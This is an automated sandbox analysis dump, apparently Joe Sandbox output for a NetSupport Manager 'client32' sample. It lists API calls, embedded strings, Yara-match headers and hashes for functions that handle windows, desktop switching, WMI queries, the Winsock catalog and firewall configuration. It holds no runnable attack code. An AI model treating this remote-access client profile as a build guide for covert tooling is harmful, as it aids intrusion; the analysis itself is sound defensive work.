                                                                              • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                              • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                              • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                              • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                              • GetDC.USER32(00000000), ref: 11134E13
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                              • CreateWindowExA.USER32(00000001,NSMWClass,03470F00,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                              • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                              • API String ID: 1594747848-1114959992
                                                                              • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                              • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                              • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                              • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11133B70
                                                                              • GetTickCount.KERNEL32 ref: 11133BA1
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                              • GetTickCount.KERNEL32 ref: 11133BBC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$FolderPathwsprintf
                                                                              • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                              • API String ID: 1170620360-4157686185
                                                                              • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                              • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                              • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                              • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                              APIs
                                                                              • _strtok.LIBCMT ref: 11027286
                                                                              • _strtok.LIBCMT ref: 110272C0
                                                                              • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strtok$Sleep
                                                                              • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                              • API String ID: 2009458258-3774545468
                                                                              • Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                              • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                              • Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                              • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6EF067B5), ref: 6EEF8D6B
                                                                                • Part of subcall function 6EEF4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6EEF8DC8), ref: 6EEF4F78
                                                                              • GetCurrentProcessId.KERNEL32 ref: 6EEF8DCB
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6EEF8DD8
                                                                              • FreeLibrary.KERNEL32(?), ref: 6EEF8EBF
                                                                                • Part of subcall function 6EEF4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6EEF4FC4
                                                                                • Part of subcall function 6EEF4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6EEF8E0D,00000000,?,6EEF8E0D,00000000,?,00000FA0,?), ref: 6EEF4FE4
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6EEF8EAE
                                                                                • Part of subcall function 6EEF5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6EEF5014
                                                                                • Part of subcall function 6EEF5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6EEF8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6EEF5034
                                                                                • Part of subcall function 6EEF2420: _strrchr.LIBCMT ref: 6EEF242E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$AddressFileLibraryModuleNameProc$ChangeCloseCurrentEnumFindFreeLoadModulesNotificationOpen_strrchr
                                                                              • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                              • API String ID: 3028219403-3484705551
                                                                              • Opcode ID: 97d927b9114a0c85f55d18f62d7beee886d9b8b36f1a354ed158acecccb8d9ed
                                                                              • Instruction ID: f1c261a2d17a40a3807a37c45ae8e1e30ce7eb3f7af04a92af177b3abdc99471
                                                                              • Opcode Fuzzy Hash: 97d927b9114a0c85f55d18f62d7beee886d9b8b36f1a354ed158acecccb8d9ed
                                                                              • Instruction Fuzzy Hash: 7041D971A10219DBDB20DBD2DC65FEAB37DEF45708F100459EA19A7240F7709A46CFA1
                                                                              APIs
                                                                                • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                              • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                              • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                              • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                              • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                              • CloseDesktop.USER32(00000000), ref: 11103829
                                                                              • GetLastError.KERNEL32 ref: 11103831
                                                                              • CloseDesktop.USER32(00000000), ref: 11103847
                                                                              • GetLastError.KERNEL32 ref: 1110384F
                                                                              Strings
                                                                              • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                              • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                              • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                              • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                              • API String ID: 2036220054-60805735
                                                                              • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                              • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                              • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                              • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                              APIs
                                                                              • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                              • GetLastError.KERNEL32 ref: 1115F275
                                                                              • wsprintfA.USER32 ref: 1115F288
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                              • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                              • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                              • API String ID: 1734919802-1728070458
                                                                              • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                              • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                              • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                              • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 11110E4A
                                                                              • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                              • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                              • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                              • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                              • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                              • API String ID: 1976012330-1024648535
                                                                              • Opcode ID: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                              • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                              • Opcode Fuzzy Hash: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                              • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                              APIs
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,EE49F673,00000000,?), ref: 1115C927
                                                                              • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                              • wsprintfW.USER32 ref: 1115C967
                                                                              • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                              • wsprintfW.USER32 ref: 1115CA27
                                                                              • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                              • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                              • API String ID: 3050498177-823534439
                                                                              • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                              • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                              • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                              • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6EF10F2B,94E48BC1,00000000,?,?,6EF2F278,000000FF,?,6EEFAE0A,?,00000000,?,00000080), ref: 6EF10D48
                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6EF10D5B
                                                                              • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6EF3CB4C,?,?,6EF2F278,000000FF,?,6EEFAE0A,?,00000000,?,00000080), ref: 6EF10D76
                                                                              • _malloc.LIBCMT ref: 6EF10D8C
                                                                                • Part of subcall function 6EF11B69: __FF_MSGBANNER.LIBCMT ref: 6EF11B82
                                                                                • Part of subcall function 6EF11B69: __NMSG_WRITE.LIBCMT ref: 6EF11B89
                                                                                • Part of subcall function 6EF11B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6EF1D3C1,6EF16E81,00000001,6EF16E81,?,6EF1F447,00000018,6EF37738,0000000C,6EF1F4D7), ref: 6EF11BAE
                                                                              • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6EF2F278,000000FF,?,6EEFAE0A,?,00000000,?), ref: 6EF10D9F
                                                                              • _free.LIBCMT ref: 6EF10D84
                                                                                • Part of subcall function 6EF11BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6EF11C13
                                                                                • Part of subcall function 6EF11BFD: GetLastError.KERNEL32(00000000), ref: 6EF11C25
                                                                              • _free.LIBCMT ref: 6EF10DAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                              • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                              • API String ID: 1360380336-1843585929
                                                                              • Opcode ID: bc17f9a7ca481b797acbeef5794fa28781dc4c195dc8179eca69843d49917729
                                                                              • Instruction ID: ea28e859b89875d951d2c91b799e64ceb498b718d2cafe4db6237d8382de4fed
                                                                              • Opcode Fuzzy Hash: bc17f9a7ca481b797acbeef5794fa28781dc4c195dc8179eca69843d49917729
                                                                              • Instruction Fuzzy Hash: 6201F7B5204306ABE6708BB08CA8FD777AC9F41B00F10481DF5658F280FAB1F444C760
                                                                              APIs
                                                                                • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                              • _memset.LIBCMT ref: 11146055
                                                                              • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                              • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                              • API String ID: 4251163631-545709139
                                                                              • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                              • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                              • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                              • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 1101567A
                                                                              • _memset.LIBCMT ref: 110156BE
                                                                              • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                              Strings
                                                                              • PackedCatalogItem, xrefs: 110156E2
                                                                              • %012d, xrefs: 11015674
                                                                              • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                              • NSLSP, xrefs: 11015708
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValue_memsetwsprintf
                                                                              • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                              • API String ID: 1333399081-1346142259
                                                                              • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                              • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                              • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                              • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                              • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                              • String ID: bad cast
                                                                              • API String ID: 2427920155-3145022300
                                                                              • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                              • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                              • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                              • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                              • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                              • API String ID: 3494822531-1878648853
                                                                              • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                              • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                              • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                              • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 6EF02FBB
                                                                              • GetTickCount.KERNEL32 ref: 6EF0300D
                                                                              • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 6EF0301B
                                                                              • _calloc.LIBCMT ref: 6EF0303B
                                                                              • _memmove.LIBCMT ref: 6EF03049
                                                                              • InterlockedDecrement.KERNEL32(-000397B9), ref: 6EF0307F
                                                                              • SetEvent.KERNEL32(00000324,?,?,?,?,?,?,?,?,?,?,?,?,?,?,910C34B3), ref: 6EF0308C
                                                                                • Part of subcall function 6EF028D0: wsprintfA.USER32 ref: 6EF02965
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                              • String ID:
                                                                              • API String ID: 3178096747-0
                                                                              • Opcode ID: da6af0660be594885205ef7652514d0bca7652e261a577d6ed15724d567570f3
                                                                              • Instruction ID: 6b56f61eec0c222ee0723ab5c2f7e9da2cf132fcc87265c2ae74101508136519
                                                                              • Opcode Fuzzy Hash: da6af0660be594885205ef7652514d0bca7652e261a577d6ed15724d567570f3
                                                                              • Instruction Fuzzy Hash: 794176B6C05609AFDB10DFE9C854AEFB7FDAF88304F00851AE519E7240E7759645CBA0
                                                                              APIs
                                                                              • IsJPIK.PCICHEK(EE49F673,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free_malloc_memsetwsprintf
                                                                              • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                              • API String ID: 2814900446-469156069
                                                                              • Opcode ID: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                              • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                              • Opcode Fuzzy Hash: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                              • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 1101792C
                                                                              • CoInitialize.OLE32(00000000), ref: 11017935
                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                              • CoUninitialize.OLE32 ref: 110179C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                              • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                              • API String ID: 2407233060-578995875
                                                                              • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                              • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                              • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                              • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 11017842
                                                                              • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                              • CoUninitialize.OLE32 ref: 110178D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                              • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                              • API String ID: 2407233060-2037925671
                                                                              • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                              • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                              • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                              • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                              APIs
                                                                              Strings
                                                                              • AutoICFConfig, xrefs: 11139650
                                                                              • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                              • DoICFConfig() OK, xrefs: 111396D6
                                                                              • Client, xrefs: 11139655
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
